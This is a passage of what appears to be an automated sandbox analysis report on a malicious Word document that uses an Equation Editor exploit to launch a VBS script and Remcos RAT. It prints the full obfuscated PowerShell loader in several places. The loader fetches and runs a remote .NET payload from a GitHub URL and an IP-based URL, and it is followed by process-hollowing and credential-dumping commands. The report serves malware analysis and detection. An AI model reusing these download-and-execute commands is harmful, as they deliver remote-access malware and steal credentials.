                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_004032C817_2_004032C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_0040168917_2_00401689
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402F6017_2_00402F60
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004169A7 appears 87 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004165FF appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434801 appears 41 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00422297 appears 42 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00434E70 appears 54 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00402093 appears 50 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0044DB70 appears 40 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00401E65 appears 35 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00444B5A appears 37 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00413025 appears 79 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416760 appears 69 times
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.powershell.exe.3ab0b60.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.powershell.exe.3ab0b60.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 13.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0000000C.00000002.407906179.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000C.00000002.407906179.0000000003649000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: powershell.exe PID: 4004, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegAsm.exe PID: 2136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F971B2FE.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: bhvD395.tmp.19.dr, bhv76C6.tmp.15.drBinary or memory string: org.slneighbors
                Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@24/33@9/5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_0041798D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,17_2_00410DE1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,13_2_0040F4AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,13_2_0041B539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_0041AADB
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$an Order and Specification 01-10- 2024.docxJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-IAW1Y3
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7A9B.tmpJump to behavior
                Source: Scan Order and Specification 01-10- 2024.docxOLE indicator, Word Document stream: true
                Source: Scan Order and Specification 01-10- 2024.docxOLE indicator, Word Document stream: true
                Source: Scan Order and Specification 01-10- 2024.docxOLE document summary: title field not present or empty
                Source: Scan Order and Specification 01-10- 2024.docxOLE document summary: title field not present or empty
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.drOLE document summary: title field not present or empty
                Source: ~WRF{E867F054-9E2E-42CB-9DBD-A2E82224CF64}.tmp.0.drOLE document summary: edited time not present or 0
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.431561710.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.424476026.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: Scan Order and Specification 01-10- 2024.docxVirustotal: Detection: 7%
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', {2}R'+'e'+'gAsm{'+'2}, {2'+'}{2},'+'{'+'2'+'}'+'{2})')-f [cHAR]39,[cHAR]36,[cHAR]34))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ichnvnuxjbsorvkwq"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\twmgvffrxjktbjyahjdg"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vyrywypslrcydpuequqaufz"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\irflzfvzpruafqgyqnkxgb"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\algvnlhhqgudzwxguvhnulfpxhl"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\srzilnhhbbbtiyigffpvarsgam"
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\niceworkwithpcitureupdateson.vBS" Jump to behavior
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LigoR1YgJyptRHIqJykubmFNZVszLDExLDJdLUpvaU4nJykoICgoJ3sxfXVybCA9IHswfWh0dCcrJ3BzJysnOi8nKycvcmF3LmcnKydpdCcrJ2h1YnVzZXJjb250JysnZW50JysnLmNvJysnbS9Ob0RlJysndGVjJysndE9uJysnL04nKydvRCcrJ2UnKyd0ZWN0JysnT24vcmVmcycrJy9oZWFkcy8nKydtYWluJysnL0RldGEnKydoTm8nKyd0aC1WLnR4dHswfTsgezEnKyd9JysnYicrJ2FzZTY0Q29udGVudCA9IChOZXcnKyctT2InKydqZWMnKyd0IFMnKyd5JysncycrJ3RlbS5OZXQnKycuV2ViJysnQ2xpZScrJ250KS4nKydEb3dubG8nKydhZFN0cicrJ2luZyh7JysnMX11JysncmwpOyB7MX1iJysnaW4nKydhcnlDb250ZW50ID0gWycrJ1N5c3QnKydlJysnbS4nKydDbycrJ252ZXInKyd0JysnXScrJzo6JysnRnJvbUJhJysnc2U2JysnNFMnKyd0JysncmknKyduZyh7JysnMScrJ31iYScrJ3NlJysnNjRDb250JysnZScrJ24nKyd0KTsgezF9YScrJ3NzZW1ibHkgPSBbJysnUmUnKydmbGVjdCcrJ2knKydvbicrJy4nKydBc3NlbScrJ2InKydseV0nKyc6OicrJ0xvJysnYWQoJysnezF9YicrJ2luYXInKyd5Q29udGUnKydudCk7IFtkbmwnKydpYi5JTy4nKydIb21lXScrJzo6JysnVkEnKydJKHsyfXR4JysndC5CR0YnKydSLycrJzAnKycxJysnNS84LjcuOCcrJzYxLjQwMS8vJysnOnB0dGh7Mn0sIHsnKycyJysnfScrJ2QnKydlc2EnKyd0aXZhZG97Mn0nKycsIHsyfWRlJysncycrJ2F0aXZhZCcrJ28nKyd7MicrJ30sIHsyJysnfWRlcycrJ2F0JysnaXZhJysnZG97JysnMn0nKycsIHsyfVInKydlJysnZ0FzbXsnKycyfSwgezInKyd9ezJ9LCcrJ3snKycyJysnfScrJ3syfSknKS1mIFtjSEFSXTM5LFtjSEFSXTM2LFtjSEFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".((GV '*mDr*').naMe[3,11,2]-JoiN'')( (('{1}url = {0}htt'+'ps'+':/'+'/raw.g'+'it'+'hubusercont'+'ent'+'.co'+'m/NoDe'+'tec'+'tOn'+'/N'+'oD'+'e'+'tect'+'On/refs'+'/heads/'+'main'+'/Deta'+'hNo'+'th-V.txt{0}; {1'+'}'+'b'+'ase64Content = (New'+'-Ob'+'jec'+'t S'+'y'+'s'+'tem.Net'+'.Web'+'Clie'+'nt).'+'Downlo'+'adStr'+'ing({'+'1}u'+'rl); {1}b'+'in'+'aryContent = ['+'Syst'+'e'+'m.'+'Co'+'nver'+'t'+']'+'::'+'FromBa'+'se6'+'4S'+'t'+'ri'+'ng({'+'1'+'}ba'+'se'+'64Cont'+'e'+'n'+'t); {1}a'+'ssembly = ['+'Re'+'flect'+'i'+'on'+'.'+'Assem'+'b'+'ly]'+'::'+'Lo'+'ad('+'{1}b'+'inar'+'yConte'+'nt); [dnl'+'ib.IO.'+'Home]'+'::'+'VA'+'I({2}tx'+'t.BGF'+'R/'+'0'+'1'+'5/8.7.8'+'61.401//'+':ptth{2}, {'+'2'+'}'+'d'+'esa'+'tivado{2}'+', {2}de'+'s'+'ativad'+'o'+'{2'+'}, {2'+'}des'+'at'+'iva'+'do{'+'2}'+', 